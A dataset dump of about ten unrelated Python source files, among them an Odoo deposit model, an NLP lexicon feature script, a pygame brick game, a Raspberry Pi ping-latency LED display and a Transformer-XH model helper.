self.env['account.move'].create({\n 'journal_id': journal.id,\n 'date': self.payment_date,\n 'ref': self.communication or '/'\n })\n move_line = self.env['account.move.line'].with_context(check_move_validity=False)\n self._get_move_lines(move_line, move_id) # Creamos líneas contables\n # Creamos línea de acreditación a la cuenta bancaria del diario\n self.env['account.move.line'].with_context(check_move_validity=True).create({\n 'name': \"%s: %s\" % (self.journal_id.name, self.communication or '/'),\n 'journal_id': journal.id,\n 'account_id': self.journal_id.default_credit_account_id.id,\n 'move_id': move_id.id,\n 'debit': self.amount,\n 'credit': 0.0,\n 'date': self.payment_date,\n })\n move_id.post()\n return self.write({\n 'state': 'posted',\n 'name': move_id.name,\n 'move_id': move_id.id\n })\n\n def _get_amount(self):\n total = 0.00\n if self.type_deposit == 'external_checks':\n for line in self.deposit_line_external_checks:\n total += line.amount\n if self.type_deposit == 'cash':\n for line in self.deposit_line_cash:\n total += line.amount\n return total\n\n @api.multi\n def load_amount(self):\n \"\"\"\n Sumar monto de cada línea de depósito dependiendo del tipo\n :return:\n \"\"\"\n total = self._get_amount()\n return self.update({'amount': total})\n\n deposit_line_cash = fields.One2many('account.deposit.line.cash', 'payment_id', readonly=True,\n states={'draft': [('readonly', False)]},\n string='Líneas de efectivo')\n deposit_line_external_checks = fields.One2many('account.deposit.line.external.checks', 'payment_id', readonly=True,\n states={'draft': [('readonly', False)]},\n string='Líneas de cheques externos')\n\n\nclass DepositLineCash(models.Model):\n _name = 'account.deposit.line.cash'\n _rec_name = 'account_id'\n\n _description = _('Lineas de depósito 
directo')\n\n account_id = fields.Many2one('account.account', 'Cuenta', required=True)\n reference = fields.Char('Referencia')\n amount = fields.Float('Monto', required=True)\n payment_id = fields.Many2one('account.payment', string=\"Depósito\", ondelete=\"cascade\")\n\n\nclass DepositLineExternalChecks(models.Model):\n _name = 'account.deposit.line.external.checks'\n _rec_name = 'bank_id'\n\n _description = _('Líneas de depósito de cheques externos')\n\n bank_id = fields.Many2one('res.bank', string='Banco', required=True)\n check_account = fields.Char('No. Cuenta', required=True)\n check_number = fields.Char('No. Cheque', required=True)\n drawer = fields.Char('Girador', required=True)\n account_id = fields.Many2one('account.account', 'Cuenta', required=True)\n amount = fields.Float('Monto', required=True)\n payment_id = fields.Many2one('account.payment', string=\"Depósito\", ondelete=\"cascade\")\n","sub_path":"eliterp_account/models/account_bank_records.py","file_name":"account_bank_records.py","file_ext":"py","file_size_in_byte":9676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
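Why the entry posted by post_deposit in the record above balances: every deposit line is booked as a credit, and one debit for the grand total is booked against the journal's bank account. A minimal plain-Python sketch of that invariant (the dicts are illustrative stand-ins for account.move.line records, not Odoo ORM calls):

    # hypothetical deposit lines, as created by _get_move_lines()
    lines = [
        {"debit": 0.0, "credit": 120.0},  # cash line
        {"debit": 0.0, "credit": 80.0},   # external-check line
    ]
    total = sum(l["credit"] for l in lines)          # what _get_amount() computes
    lines.append({"debit": total, "credit": 0.0})    # bank-account debit line
    assert sum(l["debit"] for l in lines) == sum(l["credit"] for l in lines)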
+{"seq_id":"263710649","text":"import sys\r\nimport os\r\nfrom operator import itemgetter, attrgetter\r\n#from dataprocess import *\r\nimport string\r\nfrom utils import *\r\nfrom nltk.stem import *\r\n\r\nclass Subjword:\r\n def __init__(self):\r\n self.type = \"\"\r\n self.polarity = \"\"\r\n self.word = \"\"\r\n self.pos = \"\"\r\n self.stem = \"\"\r\n\r\nclass CRFInstance:\r\n def __init__(self):\r\n self.words = []\r\n self.pos = []\r\n self.tags = []\r\n self.attr = []\r\n \r\n def buildInst(self, crfstr):\r\n lines = crfstr.rstrip('\\n').split('\\n')\r\n for line in lines:\r\n fields = line.split('\\t')\r\n self.words.append(fields[0])\r\n self.pos.append(fields[1])\r\n self.tags.append(fields[len(fields)-1])\r\n attrlist = []\r\n for i in range(2,len(fields)-1):\r\n attrlist.append(fields[i])\r\n self.attr.append(attrlist)\r\n def toString(self):\r\n crfstr = \"\"\r\n for i in range(len(self.words)):\r\n crfstr += self.words[i]+\"\\t\"+self.pos[i]+\"\\t\"\r\n for j in range(len(self.attr[i])):\r\n crfstr += self.attr[i][j]+\"\\t\"\r\n crfstr += self.tags[i]+\"\\n\"\r\n return crfstr\r\n\r\ndef loadSubjLexicon(inputfile):\r\n subjdict = {}\r\n posdict = {}\r\n for line in open(inputfile, 'r'):\r\n fields = line.rstrip('\\n').split(' ')\r\n entry = Subjword()\r\n for i in range(len(fields)):\r\n subfields = fields[i].split('=')\r\n if len(subfields) != 2:\r\n #print fields[i]\r\n continue\r\n attr = subfields[0]\r\n value = subfields[1]\r\n if attr == \"word1\":\r\n entry.word = value\r\n elif attr == \"type\":\r\n entry.type = value\r\n elif attr == \"pos1\":\r\n entry.pos = value\r\n posdict[value] = 1\r\n elif attr == \"stemmed1\":\r\n entry.stem = value\r\n elif attr == \"priorpolarity\":\r\n entry.polarity = value\r\n key = entry.word+\"-\"+entry.pos\r\n subjdict[key] = entry\r\n #print posdict\r\n #print len(subjdict)\r\n return subjdict\r\n\r\ndef loadCRFdata(crffile):\r\n rf = open(crffile, 'r')\r\n lines = rf.readlines()\r\n instances = []\r\n inststr = \"\"\r\n for i in range(len(lines)):\r\n if lines[i] == '\\n':\r\n inst = CRFInstance()\r\n inst.buildInst(inststr)\r\n instances.append(inst)\r\n inststr = \"\"\r\n else:\r\n inststr += lines[i]\r\n return instances\r\n\r\ndef genNewCRFdata(infile, outfile):\r\n wf = open(outfile, 'w')\r\n instances = loadCRFdata(infile)\r\n for inst in instances:\r\n newstr = addSubj(inst)\r\n wf.write(newstr+\"\\n\")\r\n wf.close()\r\n \r\ndef getSubjtype(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'v'\r\n else:\r\n pos = \"anypos\"\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.type\r\n else:\r\n if wordnet_pos != '':\r\n word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.type\r\n return \"\"\r\n\r\ndef wordnetStem(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'v'\r\n else:\r\n pos = \"anypos\"\r\n if wordnet_pos != '':\r\n 
word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n return word\r\n\r\ndef getSubjPolarity(word, pos):\r\n wordnet_pos = ''\r\n if pos == '':\r\n pos = \"anypos\"\r\n if pos[0] == 'N':\r\n pos = \"noun\"\r\n wordnet_pos = 'n'\r\n elif pos[0] == 'V':\r\n pos = \"verb\"\r\n wordnet_pos = 'v'\r\n elif pos[0] == 'J':\r\n pos = \"adj\"\r\n wordnet_pos = 'a'\r\n elif pos[0] == 'R':\r\n pos = \"adverb\"\r\n wordnet_pos = 'r' # WordNet tags adverbs as 'r'\r\n else:\r\n pos = \"anypos\"\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.polarity\r\n else:\r\n if wordnet_pos != '':\r\n word = wnl.lemmatize(word, wordnet_pos)\r\n else:\r\n word = wnl.lemmatize(word)\r\n if word+'-'+pos in subjdict:\r\n subjword = subjdict[word+'-'+pos]\r\n return subjword.polarity\r\n return \"\"\r\n\r\ndef addSubj(inst):\r\n for i in range(len(inst.words)):\r\n subjtype = getSubjtype(inst.words[i], inst.pos[i])\r\n if subjtype != \"\":\r\n inst.attr[i].append(subjtype)\r\n return inst.toString()\r\n\r\nsubjdict = {}\r\nwnl = WordNetLemmatizer()\r\n#subjdict = loadSubjLexicon(\"/Users/bishan/Dropbox/subjectivity_clues_hltemnlp05/subjclueslen1-HLTEMNLP05.tff\")\r\nsubjdict = loadSubjLexicon(\"subjclueslen1-HLTEMNLP05.tff\")\r\n\r\nif __name__ == \"__main__\":\r\n #path = \"/home/bishan/Dropbox/535doc/\"\r\n #path = \"/Users/bishan/Dropbox/experiment/\"\r\n #path=\"/Users/bishan/Dropbox/MPQA2.0/crfdata/\"\r\n #path=\"/Users/bishan/projects/SEMTASK/semdata/SMT/\"\r\n #path = \"/Users/bishan/projects/OpSum_data/docs/\"\r\n \r\n #genNewCRFdata(path+\"dse_target_train.crf\",path+\"subj_dse_target_train.crf\")\r\n #genNewCRFdata(path+\"dse_target_test.crf\",path+\"subj_dse_target_test.crf\")\r\n #genNewCRFdata(path+\"all_train.crf\",path+\"subj_all_train.crf\")\r\n #genNewCRFdata(path+\"all_test.crf\",path+\"subj_all_test.crf\")\r\n \r\n #genNewCRFdata(path+\"dse_train_basic.crf\",path+\"subj_dse_train.crf\")\r\n #genNewCRFdata(path+\"dse_test_basic.crf\",path+\"subj_dse_test.crf\")\r\n \r\n #genNewCRFdata(path+\"target_train_basic.crf\",path+\"subj_target_train.crf\")\r\n #genNewCRFdata(path+\"target_test_basic.crf\",path+\"subj_target_test.crf\")\r\n \r\n #genNewCRFdata(path+\"dse_train.crf\",path+\"subj_dse_train.crf\")\r\n #genNewCRFdata(path+\"dse_test.crf\",path+\"subj_dse_test.crf\")\r\n \r\n genNewCRFdata(sys.argv[1],sys.argv[2])\r\n \r\n '''\r\n #cats = [\"MSRpar\", \"MSRvid\", \"SMTeuroparl\", \"surprise.OnWN\", \"surprise.SMTnews\"]\r\n cats = [\"OnWN\", \"FNWN\", \"headlines\", \"SMT\"]\r\n for cat in cats:\r\n path=\"/Users/bishan/projects/SEMTASK/semdata_test/\"+cat+\"/\"\r\n genNewCRFdata(path+\"all_train.crf\",path+\"subj_all_train.crf\")\r\n genNewCRFdata(path+\"all_test.crf\",path+\"subj_all_test.crf\")\r\n '''\r\n '''\r\n genNewCRFdata(path+\"ese_train.crf\",path+\"subj_ese_train.crf\")\r\n genNewCRFdata(path+\"ese_test.crf\",path+\"subj_ese_test.crf\")\r\n \r\n genNewCRFdata(path+\"dse_train.crf\",path+\"subj_dse_train.crf\")\r\n genNewCRFdata(path+\"dse_test.crf\",path+\"subj_dse_test.crf\")\r\n \r\n genNewCRFdata(path+\"agent_train.crf\",path+\"subj_agent_train.crf\")\r\n genNewCRFdata(path+\"agent_test.crf\",path+\"subj_agent_test.crf\")\r\n '''","sub_path":"pipeline (executables)/Step 3 - add lexicon features/subjectivity.py","file_name":"subjectivity.py","file_ext":"py","file_size_in_byte":7378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
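The lookup convention in the record above keys the MPQA lexicon on "word-pos" and falls back to the WordNet lemma when the surface form misses. A short usage sketch (the word and the Penn tag are illustrative, and the results depend on what the loaded .tff lexicon actually contains):

    # "happy" tagged JJ is routed to the "adj" bucket of the lexicon
    print(getSubjtype("happy", "JJ"))      # e.g. "strongsubj" if present, else ""
    print(getSubjPolarity("happy", "JJ"))  # e.g. "positive" if present, else ""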
+{"seq_id":"163037001","text":"# -*- coding: utf-8 -*-\nclass Match:\n\n def __init__(self, j1, j2, sets):\n self.p1 = j1\n self.p2 = j2\n self.sets = sets\n self.p1_wins = 0\n self.p2_wins = 0\n self.p1_sets = ['', '', '', '', '']\n self.p2_sets = ['', '', '', '', '']\n self.result= (self.p1_wins)-(self.p2_wins)\n self.result1= (self.p2_wins)-(self.p2_wins)\n\n def score(self):\n lista=[self.p1_wins,self.p2_wins]\n lista1=[]\n lisreturn=[lista,lista1]\n if self.p1_wins == 0 and self.p2_wins == 0:\n return lista\n\n if self.sets == 3:\n\n if (result==2):\n lista1=[self.p1_sets[0], self.p1_sets[1]]\n return lisreturn\n if (result== 1):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2]]\n return lisreturn\n if (result1== 2):\n lista1=[self.p2_sets[0], self.p2_sets[1]]\n return lisreturn\n if (result1 == 1):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2]]\n return lisreturn\n\n elif self.sets == 5:\n if (result == 3):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2]]\n return lisreturn\n if (result == 2):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2], self.p1_sets[3]]\n return lisreturn\n if (result == 1):\n lista1=[self.p1_sets[0], self.p1_sets[1], self.p1_sets[2], self.p1_sets[3], self.p1_sets[4]]\n return lisreturn \n if (result1 == 3):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2]]\n return lisreturn\n if (result1 == 2):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2], self.p2_sets[3]]\n return lisreturn\n if (result1 == 1):\n lista1=[self.p2_sets[0], self.p2_sets[1], self.p2_sets[2], self.p2_sets[3], self.p2_sets[4]]\n return lisreturn\n\n def winer(self, jugador, set_num, points1, points2):\n ganador=1\n if self.p1 == jugador:\n self.p1_wins = self.p1_wins + ganador\n self.p1_sets[set_num - 1] = points1 + '-' + points2\n self.p2_sets[set_num - 1] = points2 + '-' + points1\n\n else:\n self.p2_wins = self.p2_wins + ganador\n self.p2_sets[set_num - 1] = points1 + '-' + points2\n self.p1_sets[set_num - 1] = points2 + '-' + points1\n","sub_path":"app/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"259562983","text":"from decorators import tiempoDeEjecucion\nimport math\n\ndef mostrar(solu,distacias):\n cont=0\n print(\"Debe parar en: \")\n for i in range(len(solu)):\n if (solu[i]==True):\n print(i+1)\n cont+=1\n print(\"cantidad minima de paradas: \", cont)\n\ndef avido(distancias, n, recorrido, gasol, solu):\n solu= [None] * gasol \n for i in range(gasol):\n recorrido=recorrido + distancias[i]\n if (recorrido>n): #cuando se pasa del limite que le permite el tanque \n num=i \n num=num-1 #si se paso es porque en la posicion anterior (i-1) debe recargar \n solu[num]=True #ponemos true en la posicion de esa parada donde recarga\n recorrido=distancias[i] \n return mostrar(solu, distancias)\n\n\n@tiempoDeEjecucion(\"avidos\")\ndef avidos():\n distancias=[23, 55, 47, 36,11, 56, 78,23, 45, 71, 43, 19, 29, 65, 72, 34, 45, 76, 80, 21, 18]\n n=80\n gasol=len(distancias)\n solu=[]\n avido(distancias, n, 0, gasol, solu)\n\navidos()\n","sub_path":"camionerosConAvidos.py","file_name":"camionerosConAvidos.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"177193619","text":"import os, sys, pygame, random, threading\nfrom pygame.locals import *\n\ntry:\n import pygame._view\nexcept:\n pass\n\nfrom az_math import Vector2\nfrom brick_brick import Brick\nfrom ball_brick import Ball\nfrom paddle_brick import Paddle\n\nclass BrickMain(object):\n def __init__(self):\n self.running = True\n self.paused = False\n self.dt = 0\n\n self.game_size = (800, 400)\n self.screen = pygame.display.set_mode(self.game_size)\n pygame.display.set_caption(\"%sx%s\" % self.game_size)\n\n self.background = pygame.Surface(self.game_size)\n self.background.convert()\n self.background.fill((0,0,0))\n self.clock = pygame.time.Clock()\n self.boxes = []\n self.numboxes = 40\n self.boxsize = (100, 20)\n\n def initObjects(self):\n self.paddle = Paddle(self, pos=Vector2(50, self.game_size[1] - 20))\n self.ball = Ball(self, pos=Vector2(50, 300))\n\n random.seed()\n for num in range(self.numboxes):\n boxesperline = self.game_size[0] / self.boxsize[0] \n posx = 100 * (num % boxesperline)\n posy = 20 * (num / boxesperline)\n colorRed = random.randint(0, 255)\n colorGreen = random.randint(0, 255)\n colorBlue = random.randint(0, 255)\n box = Brick( \\\n self, \\\n pos=Vector2(posx, posy), \\\n size=self.boxsize, \\\n color=(colorRed, colorGreen, colorBlue) \\\n )\n self.boxes.append(box)\n\n def main(self):\n\n self.initObjects()\n\n\n while self.running:\n dt = self.clock.tick(60)\n self.dt = 1/float(dt)\n\n self.listen()\n\n self.update()\n\n self.draw() \n\n if len(self.boxes) <= 0:\n self.running = False\n\n pygame.display.flip()\n\n sys.exit(0)\n\n def update(self):\n if not self.paused:\n self.ball.update(self.dt)\n self.paddle.update(self.dt)\n\n def draw(self):\n self.screen.blit(self.background, (0, 0))\n\n self.drawBackground()\n\n for box in self.boxes:\n box.draw(self.screen)\n\n self.ball.draw(self.screen)\n\n self.paddle.draw(self.screen)\n\n def drawBackground(self):\n font = pygame.font.Font(\"freesansbold.ttf\", 16)\n\n self.screen.blit( \\\n font.render(\"FPS: %s\" % int(self.clock.get_fps()), 1, (255,255,255)), \\\n (0, self.game_size[1] - 16) \\\n )\n \n def removeBrick(self, brick):\n listsansbrick = [val for val in self.boxes if val != brick]\n self.boxes = listsansbrick\n\n def listen(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = 0\n sys.exit(0)\n elif event.type == pygame.KEYDOWN:\n if event.key == K_q:\n self.running= 0\n if event.key == K_p:\n self.paused = not self.paused\n if event.key == K_a or event.key == K_d:\n self.paddle.handleKeyDown(event.key)\n elif event.type == pygame.KEYUP:\n if event.key == K_a or event.key == K_d:\n self.paddle.handleKeyUp(event.key)\n else:\n pygame.event.pump()\n\nif __name__ == '__main__':\n pygame.init()\n am = BrickMain()\n am.main()","sub_path":"main_brick.py","file_name":"main_brick.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"342805853","text":"\"\"\" 3. Longest Substring Without Repeating Characters\n\nTag: Hash Table, Two Pointers, String\n\n################################################################################\n# Author: Weikun Han \n# Crate Date: 05/31/2018\n# Update:\n# Reference: https://leetcode.com/problems/longest-substring-without-repeating-characters/description/\n################################################################################\n\"\"\"\n\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n res = 0\n worddict = {}\n left = 0\n \n for i, n in enumerate(s):\n if n not in worddict.keys():\n worddict[n] = i + 1\n \n if res < (i - left + 1):\n res = i - left + 1\n else:\n if worddict[n] > left:\n left = worddict[n]\n \n # Consider case 'abcdadc' need check first\n worddict[n] = i + 1\n\n if res < (i - left + 1):\n res = i - left + 1\n \n return res\n \n","sub_path":"003_longest_substring_without_repeating_characters.py","file_name":"003_longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"242952979","text":"#include GPIO and Timer Library \nimport RPi.GPIO as GPIO\nimport time\nimport commands\nimport re #Import regular expressions\nimport threading\n\nlatency = 70.0 #initialization global latency variable\n\nclass dotMatrix(object):\n def __init__(self):\n #define Raspberry Pi GPIO number\n self.sleeptime=0.3\n self.ROW1=22\n self.ROW2=8\n self.ROW3=24\n self.ROW4=9\n self.ROW5=14\n self.ROW6=23\n self.ROW7=4\n self.COL1=11\n self.COL2=15\n self.COL3=18\n self.COL4=10\n self.COL5=27\n \n self.ColArray=[11,15,18,10,27]\n self.RowArray=[22,8,24,9,14,23,4]\n\n #Raspberry Pi GPIO initalization\n GPIO.setmode( GPIO.BCM )\n GPIO.setup(self.COL1, GPIO.OUT)\n GPIO.setup(self.COL2, GPIO.OUT)\n GPIO.setup(self.COL3, GPIO.OUT)\n GPIO.setup(self.COL4, GPIO.OUT)\n GPIO.setup(self.COL5, GPIO.OUT)\n GPIO.setup(self.ROW1, GPIO.OUT)\n GPIO.setup(self.ROW2, GPIO.OUT)\n GPIO.setup(self.ROW3, GPIO.OUT)\n GPIO.setup(self.ROW4, GPIO.OUT)\n GPIO.setup(self.ROW5, GPIO.OUT)\n GPIO.setup(self.ROW6, GPIO.OUT)\n GPIO.setup(self.ROW7, GPIO.OUT)\n\n def clear(self):\n #set all GPIO output to LOW\n GPIO.output(self.COL1, GPIO.LOW)\n GPIO.output(self.COL2, GPIO.LOW)\n GPIO.output(self.COL3, GPIO.LOW)\n GPIO.output(self.COL4, GPIO.LOW)\n GPIO.output(self.COL5, GPIO.LOW)\n GPIO.output(self.ROW1, GPIO.LOW)\n GPIO.output(self.ROW2, GPIO.LOW)\n GPIO.output(self.ROW3, GPIO.LOW)\n GPIO.output(self.ROW4, GPIO.LOW)\n GPIO.output(self.ROW5, GPIO.LOW)\n GPIO.output(self.ROW6, GPIO.LOW)\n GPIO.output(self.ROW7, GPIO.LOW)\n time.sleep(self.sleeptime)\n\n def bringMeLight(self,t):\n for n in range(0,12):\n arr = [1,2,3,4,5,6,7,6,5,4,3,2,1]\n arr2 = [1,2,3,4,5,6,7]\n arr2.remove(arr[n])\n GPIO.output(self.COL1, GPIO.LOW)\n GPIO.output(self.COL2, GPIO.LOW)\n GPIO.output(self.COL3, GPIO.HIGH)\n GPIO.output(self.COL4, GPIO.LOW)\n GPIO.output(self.COL5, GPIO.LOW)\n GPIO.output(self.RowArray[arr[n] - 1], GPIO.LOW) \n for ind in range(0,6):\n GPIO.output(self.RowArray[arr2[ind] - 1], GPIO.HIGH)\n time.sleep(t)\n\ndef log_write(log_text):\n with open(\"/home/pi/speedometer/log.txt\", \"a\") as myfile:\n myfile.write(log_text)\n myfile.close()\n return\n\ndef ping_google(tm): #if contains 'bytes from' pass\n global latency\n while 1:\n ping_once = \"ping 173.194.44.33 -c 1\"\n output = commands.getstatusoutput(ping_once)\n if re.search('bytes from', output[1]):\n split = output[1].split('time=')\n split = split[1].split(\" \")\n log_write(split[0] + \"\\n\")\n time.sleep(tm)\n latency = split[0]\n #print latency\n\ndef main():\n global latency\n matrix=dotMatrix()\n pingSleep = 2 # ping timeout \n t1 = threading.Thread(target = ping_google, args=(pingSleep,))\n t1.start()\n \n #t1.join()\n while 1:\n latency = float(latency)\n #print latency\n if latency < 55.0:\n t = 0.04\n if latency > 55.0 and latency < 65.0:\n t = 0.08\n if latency > 65.0 and latency < 75.0:\n t = 0.12\n if latency > 75.0:\n t = 0.55\n #print t\n matrix.bringMeLight(t)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"w1_speedometer/bring_light.py","file_name":"bring_light.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"370763836","text":"# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT license.\n\nfrom .model import Model, ModelHelper\nimport torch\nimport torch.nn as nn\n\n\nclass ModelHelper_Hotpot2(ModelHelper):\n def __init__(self, node_encoder, args, bert_config, config_model):\n super(ModelHelper_Hotpot2, self).__init__(node_encoder, args, bert_config, config_model)\n #self.mrc_final_layer = nn.Linear(self.config.hidden_size, 2)\n #self.mrc_final_layer.apply(self.init_weights)\n #self._init_weights(self.mrc_final_layer)\n \n \n def forward(self, batch, device): \n ### Transformer-XH for node representations\n g = batch[0]\n # g.ndata['encoding'] = g.ndata['encoding'].to(device)\n # g.ndata['encoding_mask'] = g.ndata['encoding_mask'].to(device)\n # g.ndata['segment_id'] = g.ndata['segment_id'].to(device)\n outputs = self.node_encoder(g, g.ndata['encoding'], g.ndata['segment_id'], g.ndata['encoding_mask'], gnn_layer=self.config_model['gnn_layer'])\n node_sequence_output = outputs[0]\n node_pooled_output = outputs[1]\n node_pooled_output = self.node_dropout(node_pooled_output)\n \n #### Task specific layer (last layer)\n #mrc_logits = self.mrc_final_layer(node_sequence_output)\n node_idx=[i for i in range(batch[0].ndata['label'].size(0)) if batch[0].ndata['label'][i].item()!=-1 and batch[0].ndata['label'][i].item()!=-2 ]\n his_idx=[i for i in range(batch[0].ndata['label'].size(0)) if batch[0].ndata['label'][i].item()==-2 ]\n # print(len(node_idx))\n # print(len(his_idx))\n\n can_features=node_pooled_output[node_idx]\n his_features=node_pooled_output[his_idx]\n #print(his_features.shape,can_features.shape)\n assert 2*len(his_idx)==len(node_idx)\n\n his_features=his_features.unsqueeze(1).transpose(1,2).repeat(1,1,2).transpose(1,2).reshape(-1,his_features.shape[-1])\n #print(his_features.shape,can_features.shape)\n features=torch.cat( (his_features,can_features ) ,1)\n\n # print('features: ',features)\n\n # print('dense: ',self.score2(features))\n\n res=self.final_layer1(features)\n logits=self.final_layer2(res)\n\n\n\n # logits = self.final_layer(node_pooled_output).squeeze(-1)\n\n return logits#, mrc_logits\n\n\n\n\nclass Model_Hotpot2(Model):\n def __init__(self, args, config):\n super(Model_Hotpot2, self).__init__(args, config)\n self.network= ModelHelper_Hotpot2(self.bert_node_encoder, self.args, self.bert_config, self.config_model)\n\n\n\n\n","sub_path":"transformer-xh/model/model_hotpotqa2.py","file_name":"model_hotpotqa2.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"511924248","text":"\"\"\"A preview of an output plot.\"\"\"\n\n\nfrom kivy.uix.image import Image\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.lang import Builder\n\n\nBuilder.load_string('''\n#:kivy 1.0\n\n:\n canvas.before:\n Color:\n rgba: 1, 1, 1, .1\n BorderImage:\n size: self.size\n source: 'atlas://data/images/defaulttheme/button'\n''')\n\n\nclass PlotPreview(Screen):\n \"\"\"A preview of an output plot.\"\"\"\n\n def __init__(self, plot_path, **kwargs):\n \"\"\"Create and add the image widget, using plot_path as the source.\"\"\"\n super(PlotPreview, self).__init__(name=plot_path, **kwargs)\n image = Image(\n source=plot_path,\n pos_hint={'center_x': .5, 'center_y': .5},\n size_hint=(.9, .9),\n allow_stretch=True\n )\n self.add_widget(image)\n","sub_path":"plotygui/plotpreview.py","file_name":"plotpreview.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"138121455","text":"# Copyright (C) 2015 Jeffrey Meyers\n# This program is released under the \"MIT License\".\n# Please see the file COPYING in the source\n# distribution of this software for license terms.\n\n\n\"\"\" Scans\n\"\"\"\nID = 'id'\nDATE = 'date'\nLINE = 'line'\nDIR = 'dir'\nGEOM = 'geom'\nUSER_ID = 'user_id'\nSTOP = 'stop'\n\n\"\"\" Pairs - Scans\n\"\"\"\n#ID = 'id'\nON_ID = 'on_id'\nOFF_ID = 'off_id'\n\n\"\"\" Pairs - Stops\n\"\"\"\n#ID = 'id'\n#DATE = 'date'\n#LINE = 'line'\n#DIR = 'dir'\nON_STOP = 'on_stop'\nOFF_STOP = 'off_stop'\n#USER_ID = 'user_id'\n\n\"\"\" Surveys - Core\n\"\"\"\nURI = 'uri'\nUSER = 'user'\nMARK_COMPLETE = 'mark_complete'\nSUBMISSION_DATE = 'submission_date'\nDEVICEID = 'deviceid'\nSTART = 'start'\nEND = 'end'\nENGLISH = 'english'\nOTHER_LNG = 'other_lng'\nRTE = 'rte'\n#DIR = 'dir'\nORIG_PURPOSE = 'orig_purpose'\nORIG_PURPOSE_OTHER = 'orig_purpose_other'\nORIG_LAT = 'orig_lat'\nORIG_LNG = 'orig_lng'\nORIG_GEOM = 'orig_geom'\nORIG_ACCESS = 'orig_access'\nORIG_ACCESS_OTHER = 'orig_access_other'\nORIG_BLOCKS = 'orig_blocks'\nORIG_PARKING = 'orig_parking'\nDEST_PURPOSE = 'dest_purpose'\nDEST_PURPOSE_OTHER = 'dest_purpose_other'\nDEST_LAT = 'dest_lat'\nDEST_LNG = 'dest_lng'\nDEST_GEOM = 'dest_geom'\nDEST_ACCESS = 'dest_access'\nDEST_ACCESS_OTHER = 'dest_access_other'\nDEST_BLOCKS = 'dest_blocks'\nDEST_PARKING = 'dest_parking'\nBOARD_ID = 'board_id'\nALIGHT_ID = 'alight_id'\nBOARD_STOP = 'board_stop'\nALIGHT_STOP = 'alight_stop'\nTRANSFERS_BEFORE = 'transfers_before'\nTB_1 = 'tb_1'\nTB_2 = 'tb_2'\nTB_3 = 'tb_3'\nTRANSFERS_AFTER = 'transfers_after'\nTA_1 = 'ta_1'\nTA_2 = 'ta_2'\nTA_3 = 'ta_3'\nCHURN = 'churn'\nCHURN_OTHER = 'churn_other'\nREASON = 'reason'\nLICENSE = 'license'\nHOUSE_NO = 'house_no'\nWRK_OUT_HOUSE = 'wrk_out_house'\nWRK_VCHL = 'wrk_vchl'\nRACE = 'race'\nRACE_OTHER = 'race_other'\nINCOME = 'income'\nADDIT_LNG = 'addit_lng'\nOTHER_LNG_OTHER = 'other_lng_other'\nENGLISH_PROF = 'english_prof'\nVALID = 'valid'\n\n\"\"\" Survey - Lng\n\"\"\"\n#URI = 'uri'\nPARENT_URI = 'parent_uri'\nVALUE = 'value'\n\n","sub_path":"dashboard/mod_onoff/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
